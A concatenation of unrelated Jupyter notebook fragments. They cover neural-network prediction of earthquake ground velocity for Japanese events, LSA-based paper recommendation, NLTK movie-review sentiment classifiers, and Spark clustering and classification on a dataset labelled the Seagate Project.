cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
ax=plt.subplot(2,4,7)
plt.scatter(nei,ai,20,c=faceis_vet,cmap=cmap_facies)
ax.set_xlabel('NEI (g/cc x m/s)')
ax.set_ylabel('AI (g/cc x m/s)')
plt.grid()
cbar=plt.colorbar(pad=0)
cbar.set_label((15*' ').join(['shale', 'gas', 'brine']))
cbar.set_ticks(range(0,1)); cbar.set_ticklabels('')
plt.tight_layout()
###Output
_____no_output_____ |
0neural network.ipynb | ###Markdown
kumamoto0414
###Code
kumamoto0414=pd.read_csv('kumamoto.csv')
kumamoto0414.head()
Ypgvkumamoto0414=mlp.predict(kumamoto0414)
Lkumamoto0414=kumamoto0414.iloc[:,1].values
Kpgvkumamoto0414=pd.read_csv('pgvkumamoto.csv')
plt.title('kumamoto0414')
plt.scatter(Lkumamoto0414,Kpgvkumamoto0414, color='green', label='kansoku',alpha=1)
plt.scatter(Lkumamoto0414,Ypgvkumamoto0414, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0414,Ypgvkumamoto0414))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0414,Ypgvkumamoto0414))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0414, Ypgvkumamoto0414)))
from sklearn.metrics import r2_score
print('r^2 test data: ', r2_score(Kpgvkumamoto0414,Ypgvkumamoto0414))
###Output
r^2 test data: 0.17459876441454936
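###Markdown
The same predict / plot / score block is repeated for every event below. A small helper — a sketch that assumes the `mlp` model, `pd`, `np`, `plt` and the `metrics` import from the earlier cells — keeps that pattern in one place:
###Code
def evaluate_event(title, feature_csv, pgv_csv, xmax=500):
    # Predict PGV for one event, plot observed vs. predicted, and print the error.
    X_event = pd.read_csv(feature_csv)
    y_obs = pd.read_csv(pgv_csv)
    y_pred = mlp.predict(X_event)
    dist = X_event.iloc[:, 1].values
    plt.title(title)
    plt.scatter(dist, y_obs, color='green', label='kansoku', alpha=1)
    plt.scatter(dist, y_pred, color='darkorange', label='yosoku', alpha=1)
    plt.xlim(10, xmax)
    plt.xlabel('distance(km)')
    plt.ylabel('pgv(cm/s)')
    plt.yscale('log')
    plt.xscale('log')
    plt.legend()
    plt.grid(True)
    plt.show()
    print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_obs, y_pred)))

# Example (equivalent to the cells below):
# evaluate_event('kumamoto0416', 'kumamoto416.csv', 'pgvkumamoto416.csv', xmax=1500)
###Output
_____no_output_____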
###Markdown
kumamoto0416
###Code
kumamoto0416=pd.read_csv('kumamoto416.csv')
kumamoto0416.head()
Ypgvkumamoto0416=mlp.predict(kumamoto0416)
Lkumamoto0416=kumamoto0416.iloc[:,1].values
Kpgvkumamoto0416=pd.read_csv('pgvkumamoto416.csv')
plt.title('kumamoto0416')
plt.scatter(Lkumamoto0416,Kpgvkumamoto0416, color='green', label='kansoku',alpha=1)
plt.scatter(Lkumamoto0416,Ypgvkumamoto0416, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,1500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkumamoto0416,Ypgvkumamoto0416))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkumamoto0416,Ypgvkumamoto0416))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkumamoto0416, Ypgvkumamoto0416)))
###Output
Mean Absolute Error 2.996679669834763
Mean Squared Error: 49.066334748408224
Root Mean Squared Error: 7.004736593791963
###Markdown
osaka0618
###Code
osaka0618=pd.read_csv('osaka0618.csv')
osaka0618.head()
Ypgvosaka0618=mlp.predict(osaka0618)
Losaka0618=osaka0618.iloc[:,1].values
Kpgvosaka0618=pd.read_csv('pgvosaka0618.csv')
plt.title('osaka0618')
plt.scatter(Losaka0618,Kpgvosaka0618, color='green', label='kansoku',alpha=1)
plt.scatter(Losaka0618,Ypgvosaka0618, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,500)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka0618,Ypgvosaka0618))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka0618,Ypgvosaka0618))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka0618, Ypgvosaka0618)))
###Output
Mean Absolute Error 1.6959718992784847
Mean Squared Error: 15.254963398931798
Root Mean Squared Error: 3.9057602843661305
###Markdown
hokkaido0906
###Code
hokkaido0906=pd.read_csv('hokkaido0906.csv')
hokkaido0906.head()
Ypgvhokkaido0906=mlp.predict(hokkaido0906)
Lhokkaido0906=hokkaido0906.iloc[:,1].values
Kpgvhokkaido0906=pd.read_csv('pgvhokkaido0906.csv')
plt.title('hokkaido0906')
plt.scatter(Lhokkaido0906,Kpgvhokkaido0906, color='green', label='kansoku',alpha=1)
plt.scatter(Lhokkaido0906,Ypgvhokkaido0906, color='darkorange', label='yosoku',alpha=1)
plt.xlim(10,1000)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido0906,Ypgvhokkaido0906))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido0906,Ypgvhokkaido0906))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido0906, Ypgvhokkaido0906)))
###Output
Mean Absolute Error 3.3931648425860472
Mean Squared Error: 87.72881878979227
Root Mean Squared Error: 9.366366360002809
###Markdown
Test (distance ≤ 100 km): hokkaido
###Code
hokkaido100=pd.read_csv('h100.csv')
Ypgvhokkaido100=mlp.predict(hokkaido100)
Lhokkaido100=hokkaido100.iloc[:,1].values
Kpgvhokkaido100=pd.read_csv('ph100.csv')
plt.title('hokkaido100')
plt.scatter(Lhokkaido100,Kpgvhokkaido100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lhokkaido100,Ypgvhokkaido100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,300)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvhokkaido100,Ypgvhokkaido100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvhokkaido100,Ypgvhokkaido100)))
###Output
Mean Absolute Error 12.430680350728197
Mean Squared Error: 555.5608575338796
Root Mean Squared Error: 23.570338511228037
###Markdown
osaka
###Code
osaka100=pd.read_csv('o100.csv')
Ypgvosaka100=mlp.predict(osaka100)
Losaka100=osaka100.iloc[:,1].values
Kpgvosaka100=pd.read_csv('po100.csv')
plt.title('osaka100')
plt.scatter(Losaka100,Kpgvosaka100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Losaka100,Ypgvosaka100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,100)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvosaka100,Ypgvosaka100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvosaka100,Ypgvosaka100)))
###Output
Mean Absolute Error 4.044321723784055
Mean Squared Error: 63.70960301104061
Root Mean Squared Error: 7.981829552868228
###Markdown
kumamoto0416
###Code
kh100=pd.read_csv('kh100.csv')
Ypgvkh100=mlp.predict(kh100)
Lkh100=kh100.iloc[:,1].values
Kpgvkh100=pd.read_csv('pkh100.csv')
plt.title('kumamoto(0416)100')
plt.scatter(Lkh100,Kpgvkh100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lkh100,Ypgvkh100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,200)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkh100,Ypgvkh100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkh100,Ypgvkh100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkh100,Ypgvkh100)))
###Output
Mean Absolute Error 9.254420001665043
Mean Squared Error: 249.43201457090316
Root Mean Squared Error: 15.793416811155943
###Markdown
kumamoto0414
###Code
kz100=pd.read_csv('kz100.csv')
Ypgvkz100=mlp.predict(kz100)
Lkz100=kz100.iloc[:,1].values
Kpgvkz100=pd.read_csv('pkz100.csv')
plt.title('kumamoto(0414)100')
plt.scatter(Lkz100,Kpgvkz100,s=13, color='green', label='kansoku',alpha=1)
plt.scatter(Lkz100,Ypgvkz100,s=13, color='orange', label='yosoku',alpha=1)
plt.xlim(10,100)
plt.ylim(1,200)
plt.xlabel('distance(km)')
plt.ylabel('pgv(cm/s)')
plt.yscale('log')
plt.xscale('log')
plt.legend()
plt.grid(True)
plt.show
print('Mean Absolute Error',metrics.mean_absolute_error(Kpgvkz100,Ypgvkz100))
print('Mean Squared Error:', metrics.mean_squared_error(Kpgvkz100,Ypgvkz100))
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Kpgvkz100,Ypgvkz100)))
###Output
Mean Absolute Error 6.330815098707226
Mean Squared Error: 130.0407185445954
Root Mean Squared Error: 11.40353973749359
|
notebooks/Latent_semantic_analysis.ipynb | ###Markdown
UNSUPERVISED LEARNING Recommending documents with LSA---- ❗ NLTK is hard to install. I recommend running this notebook in Google Colab instead: https://drive.google.com/file/d/1xel4VmTqzFoZkOiEijyGhYuH6BQW5lYM/view?usp=sharing----We'd like to find documents with similar content to a document we like, but without having to rely on tagging or other labels. This is what **latent semantic analysis** is for. We can 'sense' the meaning of a document from the words it contains.Inspired by and/or based on [**science concierge**](https://github.com/titipata/science_concierge) and [**Chris Clark's repo**](https://github.com/groveco/content-engine) on content-based recommendation.[This blog post](https://www.themarketingtechnologist.co/a-recommendation-system-for-blogs-content-based-similarity-part-2/) is also really good. [Pysuggest](https://pypi.python.org/pypi/pysuggest) might be worth looking at, and so might [Crab](https://muricoca.github.io/crab/).Believe it or not, we can do all of it in about 10 lines of code!----We'll start with some data:
###Code
import pandas as pd
df = pd.read_csv('https://raw.githubusercontent.com/seg/2017-tle-hall/master/data/title_abstract_doi.csv')
df.head()
###Output
_____no_output_____
###Markdown
Prepare the data
###Code
from nltk.stem.porter import PorterStemmer
from nltk.tokenize import RegexpTokenizer
# Instantiate the stemmer and tokenizer.
stemmer, tokenizer = PorterStemmer(), RegexpTokenizer(r'\w+')
# Make a function to preprocess each item in the data.
def preprocess(item): # 3
return ' '.join(stemmer.stem(token) for token in tokenizer.tokenize(item))
# Apply the preprocessing.
data = [preprocess(item) for item in df.abstract]
###Output
_____no_output_____
###Markdown
Compute the document matrixThe matrix is a **term frequency, inverse document frequency** or "tfidf" matrix. This counts how many times words and/or phrases ('terms') appear in a document, then scales those frequencies by the inverse of how frequent they are in the cohort. So a rare word like 'coulomb' carries more weight than a common one like 'seismic'.The `sklearn` implementation automatically filters 'stop' words, eliminating things like 'the' or 'this'. It works just like `sklearn`'s other models:
###Code
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf = TfidfVectorizer(stop_words='english', ngram_range=(1,1))
vecs = tfidf.fit_transform(data)
###Output
_____no_output_____
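###Markdown
A quick way to see the weighting in action is to peek at the learned IDF values — rarer terms get larger weights. (This is an optional check; note the corpus was stemmed, and `get_feature_names` is the older scikit-learn spelling.)
###Code
names = (tfidf.get_feature_names_out() if hasattr(tfidf, 'get_feature_names_out')
         else tfidf.get_feature_names())
idf = dict(zip(names, tfidf.idf_))
for term in ('seismic', 'coulomb'):
    print(term, round(idf[term], 2) if term in idf else 'not in vocabulary')
###Output
_____no_output_____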
###Markdown
The resulting matrix has one row for each document, and one column for each 'term'. If we include n-grams, which are groups of words, the matrix will be very large.
###Code
vecs.shape
###Output
_____no_output_____
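###Markdown
To see how quickly n-grams inflate the vocabulary, here is an optional comparison with unigrams plus bigrams:
###Code
bigram_tfidf = TfidfVectorizer(stop_words='english', ngram_range=(1, 2))
print('unigrams only:      ', vecs.shape)
print('unigrams + bigrams: ', bigram_tfidf.fit_transform(data).shape)
###Output
_____no_output_____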
###Markdown
Reduce the number of dimensionsTo make the matrix more manageable, we can reduce the number of dimensions with singular value decomposition. We'll reduce it down to 100 dimensions.
###Code
from sklearn.decomposition import TruncatedSVD
svd = TruncatedSVD(n_components=100).fit_transform(vecs)
###Output
_____no_output_____
###Markdown
Build and store the distance treeThe distance tree is a fast dta structure for finding nearest neighbours in a high-dimensional space.
###Code
from sklearn.neighbors import KDTree
tree = KDTree(svd)
###Output
_____no_output_____
###Markdown
Query the tree for recommendationsNow we can find a paper we're interested in and try to find similar papers.
###Code
target = 333
df.title[target]
# Recommend 5 docs for a single document.
_, idx = tree.query([svd[target]], k=6)
[df.title[i] for i in idx[0] if i != target]
###Output
_____no_output_____ |
wei/p18.ipynb | ###Markdown
p.18 Better Training Data
###Code
from IPython.display import YouTubeVideo
YouTubeVideo('UF-RyxOAHQw')
###Output
_____no_output_____
###Markdown
1. A new datasetMuch shorter movie reviews at https://pythonprogramming.net/static/downloads/short_reviews/. 2. Example
###Code
import nltk
import random
import string
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.classify.scikitlearn import SklearnClassifier
import pickle
from sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.svm import SVC, LinearSVC, NuSVC
from nltk.classify import ClassifierI
from statistics import mode
class VoteClassifier(ClassifierI):
def __init__(self, *classifiers):
self._classifiers = classifiers
def classify(self, features):
votes = []
for c in self._classifiers:
v = c.classify(features)
votes.append(v)
return mode(votes)
def confidence(self, features):
votes = []
for c in self._classifiers:
v = c.classify(features)
votes.append(v)
choice_votes = votes.count(mode(votes))
conf = choice_votes/len(votes)
return conf
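# VoteClassifier.classify returns the majority vote of the wrapped classifiers,
# and confidence is the fraction of classifiers that agree with that vote
# (e.g. 4 out of 5 -> 0.8). Note that statistics.mode raises StatisticsError on
# a tie in Python < 3.8, so an odd number of classifiers is the safest choice.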
# If you see the "UnicodeDecodeError", add the options "encoding='utf-8', errors='replace'".
short_pos = open("short_reviews/positive.txt", "r", encoding='utf-8', errors='replace').read()
short_neg = open("short_reviews/negative.txt", "r", encoding='utf-8', errors='replace').read()
documents = []
# Note that each entry of documents is a short review, not a single word from the short review.
for r in short_pos.split('\n'):
documents.append((r, "pos"))
for r in short_neg.split('\n'):
documents.append((r, "neg"))
all_words = []
short_pos_words = word_tokenize(short_pos)
short_neg_words = word_tokenize(short_neg)
# Remove the stop words and the punctuations.
stop_words = set(stopwords.words("english"))
stop_words = stop_words.union(set(string.punctuation))
#print("stop_words:\n", stop_words)
for w in short_pos_words:
if w.lower() not in stop_words:
all_words.append(w.lower())
for w in short_neg_words:
if w.lower() not in stop_words:
all_words.append(w.lower())
all_words = nltk.FreqDist(all_words)
# Restrict our 'features' to the most common 5000 words.
word_features = all_words.most_common(5000)
word_features = [wf[0] for wf in word_features]
# Check if each of the most common 5000 words is present in one movie review.
# The input document is a short review.
def find_features(document):
words = word_tokenize(document)
features = {}
for w in word_features:
features[w] = (w in words)
return features
# print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))
# Label the 'features' in all the movie reviews.
featuresets = [(find_features(rev), category) for (rev, category) in documents]
random.shuffle(featuresets)
# Partition the entire data set into training set and test set.
training_set = featuresets[:10000]
testing_set = featuresets[10000:]
##
## Trained naive Bayes classifier
##
# Don't load this naive Bayes classfier which was trained for the long movie reviews.
#classifier_f = open("naivebayes.pickle", "rb")
#classifier = pickle.load(classifier_f)
#classifier_f.close()
#print("Naive Bayes Algo accuracy percent:", (nltk.classify.accuracy(classifier, testing_set))*100)
#classifier.show_most_informative_features(15)
##
## Scikit-Learn MultinomialNB
##
MultinomialNB_classifier = SklearnClassifier(MultinomialNB())
MultinomialNB_classifier.train(training_set)
print("MNB_classifier accuracy percent:", (nltk.classify.accuracy(MultinomialNB_classifier, testing_set))*100)
##
## Scikit-Learn GaussianNB
##
# GaussianNB_classifier = SklearnClassifier(GaussianNB())
# GaussianNB_classifier.train(training_set)
# print("GaussianNB_classifier accuracy percent:", (nltk.classify.accuracy(GaussianNB_classifier, testing_set))*100)
##
## Scikit-Learn BernoulliNB
##
BernoulliNB_classifier = SklearnClassifier(BernoulliNB())
BernoulliNB_classifier.train(training_set)
print("BernoulliNB_classifier accuracy percent:", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100)
##
## Scikit-Learn LogisticRegression
##
LogisticRegression_classifier = SklearnClassifier(LogisticRegression())
LogisticRegression_classifier.train(training_set)
print("LogisticRegression_classifier accuracy percent:", (nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100)
##
## Scikit-Learn SGDClassifier
##
SGDClassifier_classifier = SklearnClassifier(SGDClassifier())
SGDClassifier_classifier.train(training_set)
print("SGDClassifier_classifier accuracy percent:", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100)
##
## Scikit-Learn SVC
##
# The performance of the classic SVC is poor, so it is NOT used.
#SVC_classifier = SklearnClassifier(SVC())
#SVC_classifier.train(training_set)
#print("SVC_classifier accuracy percent:", (nltk.classify.accuracy(SVC_classifier, testing_set))*100)
##
## Scikit-Learn LinearSVC
##
LinearSVC_classifier = SklearnClassifier(LinearSVC())
LinearSVC_classifier.train(training_set)
print("LinearSVC_classifier accuracy percent:", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100)
##
## Scikit-Learn NuSVC
##
NuSVC_classifier = SklearnClassifier(NuSVC())
NuSVC_classifier.train(training_set)
print("NuSVC_classifier accuracy percent:", (nltk.classify.accuracy(NuSVC_classifier, testing_set))*100)
voted_classifier = VoteClassifier(#classifier,
MultinomialNB_classifier,
BernoulliNB_classifier,
LogisticRegression_classifier,
#SGDClassifier_classifier,
LinearSVC_classifier,
NuSVC_classifier)
print("voted_classifier accuracy percent:", (nltk.classify.accuracy(voted_classifier, testing_set))*100)
# print("Classification: ", voted_classifier.classify(testing_set[0][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[0][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[1][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[1][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[2][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[2][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[3][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[3][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[4][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[4][0])*100)
# print("Classification: ", voted_classifier.classify(testing_set[5][0]),
# "Confidence %: ", voted_classifier.confidence(testing_set[5][0])*100)
###Output
MNB_classifier accuracy percent: 81.47590361445783
BernoulliNB_classifier accuracy percent: 80.87349397590361
LogisticRegression_classifier accuracy percent: 80.12048192771084
|
docs/Seagate Project/Seagate_Project.ipynb | ###Markdown
K Means
###Code
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import ClusteringEvaluator
silhouette_score2=[]
evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='features', metricName='silhouette', distanceMeasure='squaredEuclidean')
for i in range(2,20):
KMeans_algo=KMeans(featuresCol='features', k=i)
KMeans_fit=KMeans_algo.fit(df_v)
output=KMeans_fit.transform(df_v)
score=evaluator.evaluate(output)
silhouette_score2.append(score)
print("Silhouette Score:",score)
fig, ax = plt.subplots(1,1, figsize =(8,6))
ax.plot(range(2,20),silhouette_score2)
ax.set_xlabel('k')
ax.set_ylabel('silhouette score')
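# Unlike an inertia/"elbow" plot, a higher silhouette score is better,
# so k is chosen near the peak of this curve.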
df_ss = df_ss.withColumn("idx", fn.monotonically_increasing_id())
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import ClusteringEvaluator
evaluator = ClusteringEvaluator(predictionCol='prediction', featuresCol='scaled_features', metricName='silhouette', distanceMeasure='squaredEuclidean')
k = 2
kmeans = KMeans().setK(k).setSeed(1).setFeaturesCol("scaled_features")
model = kmeans.fit(df_ss)
centers = model.clusterCenters()
print("Cluster Centers: ")
for center in centers:
print(center)
predictions = model.transform(df_ss)
silhouette = evaluator.evaluate(predictions)
print("Silhouette with squared euclidean distance = " + str(silhouette))
print("Cluster Centers: ")
ctr=[]
centers = model.clusterCenters()
for center in centers:
ctr.append(center)
###Output
Silhouette with squared euclidean distance = 0.17330592905654787
Cluster Centers:
[-1.10568157e-02 1.34843725e-02 -1.04165171e-02 -1.07746528e-02
-1.82602199e-02 -5.35942898e-03 -1.59187558e-02 -1.92205419e-03
-3.21163442e-03 -1.70558380e-02 -8.81915530e-03 -6.46422412e-02
2.19091126e-02 -6.63283877e-02 3.55648284e-03 -1.23584312e-02
1.49290632e-03 -7.66098439e-03 6.68002717e-04 -1.11116874e-02
7.54137867e-04 1.98849887e-02 1.59907224e-02 -1.09136177e-02
-9.60715084e-03 -6.06493694e-02 -4.61885312e-02 -4.44842920e-02
-3.98679304e-03 -1.37413704e-02 9.15865457e-03 7.60859348e-03
-3.74162031e-02 -2.39044254e-02 8.40289097e-03 -4.16010105e-02
3.70695648e-02 1.10310233e-02 2.19313502e-02 1.77222300e-02
5.36477363e-02 -5.45637179e-02 7.87159762e-03 2.90631725e-04
-4.19009058e-01 -4.59656757e-03 4.19077903e-01 -7.54482487e-02
7.54482487e-02 2.40856690e-03 3.60244610e-03 -7.50485651e-02
7.48556008e-02 -1.17053363e-03 1.70113831e-02 1.33078735e-02
-7.71346423e-02 1.59010531e-01 -9.46546529e-02 -7.80095966e-02
8.50552162e-02 -8.50552162e-02 3.74939351e-02 2.50487766e-01
-3.36164382e-01 -1.31308431e-02 3.28869333e-03 1.05387308e-02
2.20105433e-03 1.11732540e-02 7.56609515e-03 -8.09948540e-04
-2.11786570e-03 -4.38592868e-02 2.78227936e-03 5.41773431e-03
3.27517648e-03 4.11810283e-03 -1.98147911e-03 2.83417694e-03
-5.16867116e-03 -1.14333043e-01 -5.69603035e-02 -6.87829857e-02
-6.17918061e-02 1.34407382e-01 -1.41018271e-01 3.70226779e-01
-2.44944142e-01 -2.15179912e-01 8.12204932e-03 6.97542646e-03
-2.79953174e-02 2.22467261e-02 2.48139751e-02 3.29965674e-02
-1.33523132e-01 9.20129789e-02 -6.66564860e-03 -5.24975561e-03
-1.60558163e-02 1.52833106e-01 -7.30094880e-02 -6.69709784e-03
-1.31171924e-01 3.06982277e-03 8.46501453e-03 1.65428156e-01
-5.32459648e-02 -6.64559195e-03 -1.69188955e-01 -8.65720313e-02
-2.08733285e-02 8.62520213e-02 -3.52431367e-05 8.95333791e-02
-2.12298653e-02 -8.00797023e-02 -8.10280748e-03 -3.25379090e-04
-2.58043674e-02 -5.92491508e-01 -6.10100977e-03 5.92554985e-01]
[ 3.04314511e-02 -3.71127668e-02 2.86691700e-02 2.96548598e-02
5.02572353e-02 1.47506484e-02 4.38128707e-02 5.29003102e-03
8.83931670e-03 4.69424392e-02 2.42727834e-02 1.77913538e-01
-6.03000091e-02 1.82554285e-01 -9.78843606e-03 3.40138612e-02
-4.10889597e-03 2.10851730e-02 -1.83853042e-03 3.05824734e-02
-2.07559845e-03 -5.47290537e-02 -4.40109431e-02 3.00373301e-02
2.64415676e-02 1.66924037e-01 1.27123764e-01 1.22433220e-01
1.09727701e-02 3.78200967e-02 -2.52071804e-02 -2.09409785e-02
1.02979862e-01 6.57916683e-02 -2.31271075e-02 1.14497623e-01
-1.02025816e-01 -3.03604630e-02 -6.03612131e-02 -4.87765364e-02
-1.47653584e-01 1.50174621e-01 -2.16648395e-02 -7.99899840e-04
1.15323019e+00 1.26510403e-02 -1.15341967e+00 2.07654694e-01
-2.07654694e-01 -6.62905013e-03 -9.91493980e-03 2.06554653e-01
-2.06023562e-01 3.22163613e-03 -4.68200870e-02 -3.66269920e-02
2.12296122e-01 -4.37641479e-01 2.60516094e-01 2.14704241e-01
-2.34095757e-01 2.34095757e-01 -1.03193802e-01 -6.89412431e-01
9.25218454e-01 3.61397547e-02 -9.05140436e-03 -2.90055364e-02
-6.05791748e-03 -3.07519219e-02 -2.08240112e-02 2.22920504e-03
5.82895908e-03 1.20713031e-01 -7.65761141e-03 -1.49111210e-02
-9.01420222e-03 -1.13341714e-02 5.45358504e-03 -7.80044807e-03
1.42256295e-02 3.14676529e-01 1.56770695e-01 1.89310025e-01
1.70068343e-01 -3.69926729e-01 3.88121745e-01 -1.01896770e+00
6.74154825e-01 5.92235335e-01 -2.23541527e-02 -1.91983257e-02
7.70509479e-02 -6.12292159e-02 -6.82950035e-02 -9.08157874e-02
3.67493025e-01 -2.53245467e-01 1.83457303e-02 1.44487966e-02
4.41900997e-02 -4.20639478e-01 2.00942542e-01 1.84322874e-02
3.61021843e-01 -8.44901134e-03 -2.32980889e-02 -4.55304579e-01
1.46547796e-01 1.82905288e-02 4.65655350e-01 2.38270457e-01
5.74492413e-02 -2.37389700e-01 9.69989748e-05 -2.46420915e-01
5.84305304e-02 2.20401751e-01 2.23011937e-02 8.95534312e-04
7.10208402e-02 1.63070244e+00 1.67916862e-02 -1.63087714e+00]
###Markdown
Logistic
###Code
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'features',labelCol='TARGET')
modelv = logistic.fit(trainv)
test_modelv = modelv.transform(testv)
trainingSummaryv = modelv.summary
roc = trainingSummaryv.roc.toPandas()
plt.plot(roc['FPR'],roc['TPR'])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.title('ROC Curve')
plt.show()
print('Training set areaUnderROC: ' + str(trainingSummaryv.areaUnderROC))
import pyspark.ml.evaluation as ev
evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluatorv.evaluate(test_modelv, {evaluatorv.metricName: 'areaUnderROC'}))
logistic = cl.LogisticRegression(maxIter=10,featuresCol = 'scaled_features',labelCol='TARGET')
models = logistic.fit(trains)
test_models = models.transform(tests)
trainingSummarys = models.summary
roc = trainingSummarys.roc.toPandas()
plt.plot(roc['FPR'],roc['TPR'])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
plt.title('ROC Curve')
plt.show()
print('Training set areaUnderROC: ' + str(trainingSummarys.areaUnderROC))
evaluators = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
print(evaluators.evaluate(test_models, {evaluators.metricName: 'areaUnderROC'}))
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = test_models.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
###Output
[[8.6422e+04 2.0000e+00]
[2.3280e+03 0.0000e+00]]
###Markdown
Random Forest
###Code
df_v = df_v.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType()))
df_ss = df_ss.withColumn('TARGET', fn.col('TARGET').cast(types.DoubleType()))
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'features', labelCol='TARGET')
modelv = classifier.fit(trainv)
testv = modelv.transform(testv)
print(evaluatorv.evaluate(testv, {evaluatorv.metricName: "areaUnderROC"}))
classifier = cl.RandomForestClassifier(numTrees=5, maxDepth=5, featuresCol = 'scaled_features', labelCol='TARGET')
models = classifier.fit(trains)
tests = models.transform(tests)
print(evaluators.evaluate(tests, {evaluators.metricName: "areaUnderROC"}))
from pyspark.mllib.evaluation import MulticlassMetrics
preds_and_labels = tests.select(['prediction','TARGET']).withColumn('label', fn.col('TARGET').cast(types.FloatType())).orderBy('prediction')
preds_and_labels = preds_and_labels.select(['prediction','label'])
metrics = MulticlassMetrics(preds_and_labels.rdd.map(tuple))
print(metrics.confusionMatrix().toArray())
###Output
[[86424. 0.]
[ 2328. 0.]]
###Markdown
GBT
###Code
trainv, testv = df_v.randomSplit([0.7, 0.3], seed = 1)
trains, tests = df_ss.randomSplit([0.7, 0.3], seed = 1)
gbtv = cl.GBTClassifier(maxIter=10, labelCol='TARGET',featuresCol = 'features')
gbtModelv = gbtv.fit(trainv)
predictionsv = gbtModelv.transform(testv)
import pyspark.ml.evaluation as ev
evaluatorv = ev.BinaryClassificationEvaluator(rawPredictionCol='probability', labelCol='TARGET')
